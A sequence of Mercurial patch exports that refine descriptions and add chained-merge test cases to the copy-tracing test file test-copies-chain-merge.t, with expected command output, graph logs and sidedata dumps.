explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way |\ - +---o 32 mCB-revert-m-0 + +---o 32 mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way | |/ | o 6 c-1 delete d | | @@ -687,12 +689,12 @@ mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way - mBC-revert-m-0 + mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way mBCm-1 re-add d mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way mBFm-0 simple merge - one way - mCB-revert-m-0 + mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way mCBm-1 re-add d mCGm-0 merge updated/deleted - revive the file (updated content) - one way @@ -1694,9 +1696,9 @@ copy tracing chain. $ hg log -G --rev '::(desc("mCB-revert-m")+desc("mBC-revert-m"))' - o 33 mBC-revert-m-0 + o 33 mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way |\ - +---o 32 mCB-revert-m-0 + +---o 32 mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way | |/ | o 6 c-1 delete d | | # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613451729 -3600 # Tue Feb 16 06:02:09 2021 +0100 # Node ID 60c52bdb1784579b5ee35737d8a5044cf0d4e116 # Parent 311a18777f45e9be069f8adc83bb34620aa5ef30 test-copies: improve description of the C+H case This will make its role clearer. Differential Revision: https://phab.mercurial-scm.org/D10045 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -626,6 +626,8 @@ (the copy information from the branch that was not deleted should win). + $ case_desc="simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch)" + $ hg up 'desc("i-0")' 3 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg mv b d @@ -637,19 +639,19 @@ $ hg merge 'desc("h-1")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m "mCH-delete-before-conflict-m-0" + $ hg ci -m "mCH-delete-before-conflict-m-0 $case_desc - one way" $ hg up 'desc("h-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg merge 'desc("c-1")' 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m "mHC-delete-before-conflict-m-0" + $ hg ci -m "mHC-delete-before-conflict-m-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mCH-delete-before-conflict-m")+desc("mHC-delete-before-conflict-m"))' - @ 36 mHC-delete-before-conflict-m-0 + @ 36 mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way |\ - +---o 35 mCH-delete-before-conflict-m-0 + +---o 35 mCH-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - one way | |/ | o 34 h-1: b -(move)-> d | | @@ -698,7 +700,7 @@ mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way mCBm-1 re-add d mCGm-0 merge updated/deleted - revive the file (updated content) - one way - mCH-delete-before-conflict-m-0 + mCH-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - one way mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way @@ -707,7 +709,7 @@ mGCm-0 merge updated/deleted - revive the file (updated content) - the other way mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way - mHC-delete-before-conflict-m-0 + mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way Test that sidedata computations during upgrades are correct @@ -1742,9 +1744,9 @@ (the copy information from the branch that was not deleted should win). $ hg log -G --rev '::(desc("mCH-delete-before-conflict-m")+desc("mHC-delete-before-conflict-m"))' - o 36 mHC-delete-before-conflict-m-0 + o 36 mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way |\ - +---o 35 mCH-delete-before-conflict-m-0 + +---o 35 mCH-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - one way | |/ | o 34 h-1: b -(move)-> d | | # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613648716 -3600 # Thu Feb 18 12:45:16 2021 +0100 # Node ID f8888f5c8c50b083eb4047e7458dd3d3a01389f5 # Parent 60c52bdb1784579b5ee35737d8a5044cf0d4e116 test-copies: improve description of the B+F case This will make its role clearer. Differential Revision: https://phab.mercurial-scm.org/D10046 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -358,7 +358,7 @@ - one with change to an unrelated file (b) - one overwriting a file (d) with a rename (from h to i to d) - $ case_desc="simple merge" + $ case_desc="simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d)" $ hg up 'desc("i-2")' 2 files updated, 0 files merged, 1 files removed, 0 files unresolved @@ -389,9 +389,9 @@ $ hg ci -m "mFBm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mBFm")+desc("mFBm"))' - @ 24 mFBm-0 simple merge - the other way + @ 24 mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way |\ - +---o 23 mBFm-0 simple merge - one way + +---o 23 mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way | |/ | o 22 f-2: rename i -> d | | @@ -695,7 +695,7 @@ mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way mBCm-1 re-add d mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way - mBFm-0 simple merge - one way + mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way mCBm-1 re-add d @@ -704,7 +704,7 @@ mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way - mFBm-0 simple merge - the other way + mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way mGCm-0 merge updated/deleted - revive the file (updated content) - the other way mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way @@ -1314,9 +1314,9 @@ - one overwriting a file (d) with a rename (from h to i to d) $ hg log -G --rev '::(desc("mBFm")+desc("mFBm"))' - o 24 mFBm-0 simple merge - the other way + o 24 mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way |\ - +---o 23 mBFm-0 simple merge - one way + +---o 23 mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way | |/ | o 22 f-2: rename i -> d | | # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613652595 -3600 # Thu Feb 18 13:49:55 2021 +0100 # Node ID f01696d45d1e4bc0ca7a48410ed19ad2e5b7ecdc # Parent f8888f5c8c50b083eb4047e7458dd3d3a01389f5 test-copies: add subcase titles for various "conflicting" information variant This make the transitions between case clearer. Differential Revision: https://phab.mercurial-scm.org/D10047 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -312,6 +312,9 @@ Comparing with a merge with colliding rename -------------------------------------------- +Subcase: new copy information on both side +`````````````````````````````````````````` + - the "e-" branch renaming b to f (through 'g') - the "a-" branch renaming d to f (through e) @@ -353,6 +356,8 @@ o 0 i-0 initial commit: a b h +Subcase: existing copy information overwritten on one branch +```````````````````````````````````````````````````````````` Merge: - one with change to an unrelated file (b) @@ -407,6 +412,9 @@ +Subcase: reset of the copy history on one side +`````````````````````````````````````````````` + Merge: - one with change to a file - one deleting and recreating the file @@ -455,6 +463,8 @@ o 0 i-0 initial commit: a b h +Subcase: merging a change to a file with a "copy overwrite" to that file from another branch +```````````````````````````````````````````````````````````````````````````````````````````` Merge: - one with change to a file (d) @@ -1190,6 +1200,9 @@ Comparing with a merge with colliding rename -------------------------------------------- +Subcase: new copy information on both side +`````````````````````````````````````````` + - the "e-" branch renaming b to f (through 'g') - the "a-" branch renaming d to f (through e) @@ -1304,6 +1317,9 @@ R b +Subcase: existing copy information overwritten on one branch +```````````````````````````````````````````````````````````` + Note: | In this case, one of the merge wrongly record a merge while there is none. | This lead to bad copy tracing information to be dug up. @@ -1397,6 +1413,8 @@ ~ #endif +Subcase: reset of the copy history on one side +`````````````````````````````````````````````` Merge: - one with change to a file @@ -1502,6 +1520,8 @@ ~ #endif +Subcase: merging a change to a file with a "copy overwrite" to that file from another branch +```````````````````````````````````````````````````````````````````````````````````````````` Merge: - one with change to a file (d) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613486634 -3600 # Tue Feb 16 15:43:54 2021 +0100 # Node ID fbc466484fc3c94ba7ab64a8c8d256ced783a498 # Parent f01696d45d1e4bc0ca7a48410ed19ad2e5b7ecdc test-copies: add test chaining multiple merges Right now, the copy tracing logic take the right decision for merges, but it does not keep track of the right information about these decision and can fall into later traps. We start with highlighting this possibility by adding new tests, and we will fix them later. Check the inline test documentation for details. Differential Revision: https://phab.mercurial-scm.org/D9609 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -674,6 +674,113 @@ o 0 i-0 initial commit: a b h +Decision from previous merge are properly chained with later merge +------------------------------------------------------------------ + +Subcase: chaining conflicting rename resolution +``````````````````````````````````````````````` + +The "mAEm" and "mEAm" case create a rename tracking conflict on file 'f'. We +add more change on the respective branch and merge again. These second merge +does not involve the file 'f' and the arbitration done within "mAEm" and "mEA" +about that file should stay unchanged. + + $ case_desc="chained merges (conflict -> simple) - same content everywhere" + +(extra unrelated changes) + + $ hg up 'desc("a-2")' + 2 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ echo j > unrelated-j + $ hg add unrelated-j + $ hg ci -m 'j-1: unrelated changes (based on the "a" series of changes)' + created new head + + $ hg up 'desc("e-2")' + 2 files updated, 0 files merged, 2 files removed, 0 files unresolved (no-changeset !) + 1 files updated, 0 files merged, 2 files removed, 0 files unresolved (changeset !) + $ echo k > unrelated-k + $ hg add unrelated-k + $ hg ci -m 'k-1: unrelated changes (based on "e" changes)' + created new head + +(merge variant 1) + + $ hg up 'desc("mAEm")' + 1 files updated, 0 files merged, 2 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 2 files removed, 0 files unresolved (changeset !) + $ hg merge 'desc("k-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mAE,Km: $case_desc" + +(merge variant 2) + + $ hg up 'desc("k-1")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) + + $ hg merge 'desc("mAEm")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) + (branch merge, don't forget to commit) + $ hg ci -m "mK,AEm: $case_desc" + created new head + +(merge variant 3) + + $ hg up 'desc("mEAm")' + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("j-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mEA,Jm: $case_desc" + +(merge variant 4) + + $ hg up 'desc("j-1")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) + $ hg merge 'desc("mEAm")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) + (branch merge, don't forget to commit) + $ hg ci -m "mJ,EAm: $case_desc" + created new head + + + $ hg log -G --rev '::(desc("mAE,Km") + desc("mK,AEm") + desc("mEA,Jm") + desc("mJ,EAm"))' + @ 42 mJ,EAm: chained merges (conflict -> simple) - same content everywhere + |\ + +---o 41 mEA,Jm: chained merges (conflict -> simple) - same content everywhere + | |/ + | | o 40 mK,AEm: chained merges (conflict -> simple) - same content everywhere + | | |\ + | | +---o 39 mAE,Km: chained merges (conflict -> simple) - same content everywhere + | | | |/ + | | | o 38 k-1: unrelated changes (based on "e" changes) + | | | | + | o | | 37 j-1: unrelated changes (based on the "a" series of changes) + | | | | + o-----+ 20 mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way + |/ / / + | o / 19 mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way + |/|/ + | o 10 e-2 g -move-> f + | | + | o 9 e-1 b -move-> g + | | + o | 4 a-2: e -move-> f + | | + o | 3 a-1: d -move-> e + |/ + o 2 i-2: c -move-> d + | + o 1 i-1: a -move-> c + | + o 0 i-0 initial commit: a b h + + Summary of all created cases ---------------------------- @@ -698,7 +805,10 @@ i-0 initial commit: a b h i-1: a -move-> c i-2: c -move-> d + j-1: unrelated changes (based on the "a" series of changes) + k-1: unrelated changes (based on "e" changes) mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way + mAE,Km: chained merges (conflict -> simple) - same content everywhere mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way @@ -713,6 +823,7 @@ mCH-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - one way mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way + mEA,Jm: chained merges (conflict -> simple) - same content everywhere mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way @@ -720,6 +831,8 @@ mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way + mJ,EAm: chained merges (conflict -> simple) - same content everywhere + mK,AEm: chained merges (conflict -> simple) - same content everywhere Test that sidedata computations during upgrades are correct @@ -962,6 +1075,32 @@ 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' + ##### revision 37 ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' + added : unrelated-j, ; + ##### revision 38 ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-k' + added : unrelated-k, ; + ##### revision 39 ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision 40 ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision 41 ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision 42 ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' #endif @@ -1801,3 +1940,62 @@ R a $ hg status --copies --rev 'desc("h-1")' --rev 'desc("mHC-delete-before-conflict-m")' R a + +Decision from previous merge are properly chained with later merge +------------------------------------------------------------------ + + +Subcase: chaining conflicting rename resolution +``````````````````````````````````````````````` + +The "mAEm" and "mEAm" case create a rename tracking conflict on file 'f'. We +add more change on the respective branch and merge again. These second merge +does not involve the file 'f' and the arbitration done within "mAEm" and "mEA" +about that file should stay unchanged. + +The result from mAEm is the same for the subsequent merge: + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAEm")' f + A f + a (filelog !) + a (sidedata !) + a (upgraded !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAE,Km")' f + A f + a (filelog !) + a (sidedata !) + a (upgraded !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mK,AEm")' f + A f + a (filelog !) + a (missing-correct-output sidedata !) + a (missing-correct-output upgraded !) + b (known-bad-output sidedata !) + b (known-bad-output upgraded !) + + +The result from mEAm is the same for the subsequent merge: + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEAm")' f + A f + a (filelog !) + b (sidedata !) + b (upgraded !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEA,Jm")' f + A f + a (filelog !) + b (sidedata !) + b (upgraded !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mJ,EAm")' f + A f + a (filelog !) + b (missing-correct-output sidedata !) + b (missing-correct-output upgraded !) + a (known-bad-output sidedata !) + a (known-bad-output upgraded !) + + # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1607964990 -3600 # Mon Dec 14 17:56:30 2020 +0100 # Node ID 3805b13ad7fe3d5f437ad5bd0cf139554a249821 # Parent fbc466484fc3c94ba7ab64a8c8d256ced783a498 test-copies: add test chaining multiple merges Right now, the copy tracing logic take the right decision for merges, but it does not keep track of the right information about these decision and can fall into later traps. We start with highlighting this possibility by adding new tests, and we will fix them later. Check the inline test documentation for details. Differential Revision: https://phab.mercurial-scm.org/D9610 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -781,6 +781,91 @@ o 0 i-0 initial commit: a b h +Subcase: chaining salvage information during a merge +```````````````````````````````````````````````````` + +We add more change on the branch were the file was deleted. merging again +should preserve the fact eh file was salvaged. + + $ case_desc="chained merges (salvaged -> simple) - same content (when the file exists)" + +(creating the change) + + $ hg up 'desc("c-1")' + 1 files updated, 0 files merged, 2 files removed, 0 files unresolved + $ echo l > unrelated-l + $ hg add unrelated-l + $ hg ci -m 'l-1: unrelated changes (based on "c" changes)' + created new head + +(Merge variant 1) + + $ hg up 'desc("mBC-revert-m")' + 2 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("l-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mBC+revert,Lm: $case_desc" + +(Merge variant 2) + + $ hg up 'desc("mCB-revert-m")' + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("l-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mCB+revert,Lm: $case_desc" + +(Merge variant 3) + + $ hg up 'desc("l-1")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + + $ hg merge 'desc("mBC-revert-m")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mL,BC+revertm: $case_desc" + created new head + +(Merge variant 4) + + $ hg up 'desc("l-1")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + + $ hg merge 'desc("mCB-revert-m")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mL,CB+revertm: $case_desc" + created new head + + $ hg log -G --rev '::(desc("mBC+revert,Lm") + desc("mCB+revert,Lm") + desc("mL,BC+revertm") + desc("mL,CB+revertm"))' + @ 47 mL,CB+revertm: chained merges (salvaged -> simple) - same content (when the file exists) + |\ + | | o 46 mL,BC+revertm: chained merges (salvaged -> simple) - same content (when the file exists) + | |/| + +-+---o 45 mCB+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists) + | | | + | +---o 44 mBC+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists) + | | |/ + | o | 43 l-1: unrelated changes (based on "c" changes) + | | | + | | o 33 mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way + | |/| + o---+ 32 mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way + |/ / + o | 6 c-1 delete d + | | + | o 5 b-1: b update + |/ + o 2 i-2: c -move-> d + | + o 1 i-1: a -move-> c + | + o 0 i-0 initial commit: a b h + + + + Summary of all created cases ---------------------------- @@ -807,15 +892,18 @@ i-2: c -move-> d j-1: unrelated changes (based on the "a" series of changes) k-1: unrelated changes (based on "e" changes) + l-1: unrelated changes (based on "c" changes) mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way mAE,Km: chained merges (conflict -> simple) - same content everywhere mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way + mBC+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists) mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way mBCm-1 re-add d mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way + mCB+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists) mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way mCBm-1 re-add d @@ -833,6 +921,8 @@ mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way mJ,EAm: chained merges (conflict -> simple) - same content everywhere mK,AEm: chained merges (conflict -> simple) - same content everywhere + mL,BC+revertm: chained merges (salvaged -> simple) - same content (when the file exists) + mL,CB+revertm: chained merges (salvaged -> simple) - same content (when the file exists) Test that sidedata computations during upgrades are correct @@ -1101,6 +1191,27 @@ 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' + ##### revision 43 ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-l' + added : unrelated-l, ; + ##### revision 44 ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision 45 ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision 46 ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision 47 ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' #endif @@ -1999,3 +2110,61 @@ a (known-bad-output upgraded !) +Subcase: chaining salvage information during a merge +```````````````````````````````````````````````````` + +We add more change on the branch were the file was deleted. merging again +should preserve the fact eh file was salvaged. + +reference output: + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCB-revert-m-0")' + M b + A d + a (filelog !) + a (sidedata !) + a (upgraded !) + R a + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBC-revert-m-0")' + M b + A d + a (filelog !) + a (sidedata !) + a (upgraded !) + R a + +chained output + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBC+revert,Lm")' + M b + A d + a (filelog !) + a (missing-correct-output sidedata !) + a (missing-correct-output upgraded !) + A unrelated-l + R a + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCB+revert,Lm")' + M b + A d + a (filelog !) + a (missing-correct-output sidedata !) + a (missing-correct-output upgraded !) + A unrelated-l + R a + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mL,BC+revertm")' + M b + A d + a (filelog !) + a (missing-correct-output sidedata !) + a (missing-correct-output upgraded !) + A unrelated-l + R a + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mL,CB+revertm")' + M b + A d + a (filelog !) + a (missing-correct-output sidedata !) + a (missing-correct-output upgraded !) + A unrelated-l + R a + # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1607965016 -3600 # Mon Dec 14 17:56:56 2020 +0100 # Node ID 075b2499e3d65e4526bc13e2e0403a981e6c0b11 # Parent 3805b13ad7fe3d5f437ad5bd0cf139554a249821 test-copies: add test chaining multiple merge Right now, the copy tracing logic take the right decision for merges, but it does not keep track of the right information about these decision and can fall into later traps. We start with highlighting this possibility by adding new tests, and we will fix them later. Check the inline test documentation for details. Differential Revision: https://phab.mercurial-scm.org/D9611 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -865,7 +865,100 @@ +Subcase: chaining "merged" information during a merge +`````````````````````````````````````````````````````` +When a non-rename change are merged with a copy overwrite, the merge pick the copy source from (p1) as the reference. We should preserve this information in subsequent merges. + + $ case_desc="chained merges (copy-overwrite -> simple) - same content" + +(extra unrelated changes) + + $ hg up 'desc("f-2")' + 2 files updated, 0 files merged, 2 files removed, 0 files unresolved (no-changeset !) + 1 files updated, 0 files merged, 2 files removed, 0 files unresolved (changeset !) + $ echo n > unrelated-n + $ hg add unrelated-n + $ hg ci -m 'n-1: unrelated changes (based on the "f" series of changes)' + created new head + + $ hg up 'desc("g-1")' + 2 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ echo o > unrelated-o + $ hg add unrelated-o + $ hg ci -m 'o-1: unrelated changes (based on "g" changes)' + created new head + +(merge variant 1) + + $ hg up 'desc("mFGm")' + 1 files updated, 0 files merged, 2 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 2 files removed, 0 files unresolved (changeset !) + $ hg merge 'desc("o-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mFG,Om: $case_desc" + +(merge variant 2) + + $ hg up 'desc("o-1")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) + $ hg merge 'desc("FGm")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) + (branch merge, don't forget to commit) + $ hg ci -m "mO,FGm: $case_desc" + created new head + +(merge variant 3) + + $ hg up 'desc("mGFm")' + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("n-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mGF,Nm: $case_desc" + +(merge variant 4) + + $ hg up 'desc("n-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("mGFm")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mN,GFm: $case_desc" + created new head + + $ hg log -G --rev '::(desc("mFG,Om") + desc("mO,FGm") + desc("mGF,Nm") + desc("mN,GFm"))' + @ 53 mN,GFm: chained merges (copy-overwrite -> simple) - same content + |\ + +---o 52 mGF,Nm: chained merges (copy-overwrite -> simple) - same content + | |/ + | | o 51 mO,FGm: chained merges (copy-overwrite -> simple) - same content + | | |\ + | | +---o 50 mFG,Om: chained merges (copy-overwrite -> simple) - same content + | | | |/ + | | | o 49 o-1: unrelated changes (based on "g" changes) + | | | | + | o | | 48 n-1: unrelated changes (based on the "f" series of changes) + | | | | + o-----+ 29 mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way + |/ / / + | o / 28 mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way + |/|/ + | o 25 g-1: update d + | | + o | 22 f-2: rename i -> d + | | + o | 21 f-1: rename h -> i + |/ + o 2 i-2: c -move-> d + | + o 1 i-1: a -move-> c + | + o 0 i-0 initial commit: a b h + Summary of all created cases ---------------------------- @@ -914,15 +1007,21 @@ mEA,Jm: chained merges (conflict -> simple) - same content everywhere mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way + mFG,Om: chained merges (copy-overwrite -> simple) - same content mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way mGCm-0 merge updated/deleted - revive the file (updated content) - the other way mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way + mGF,Nm: chained merges (copy-overwrite -> simple) - same content mGFm-0 merge - G side: content change, F side: 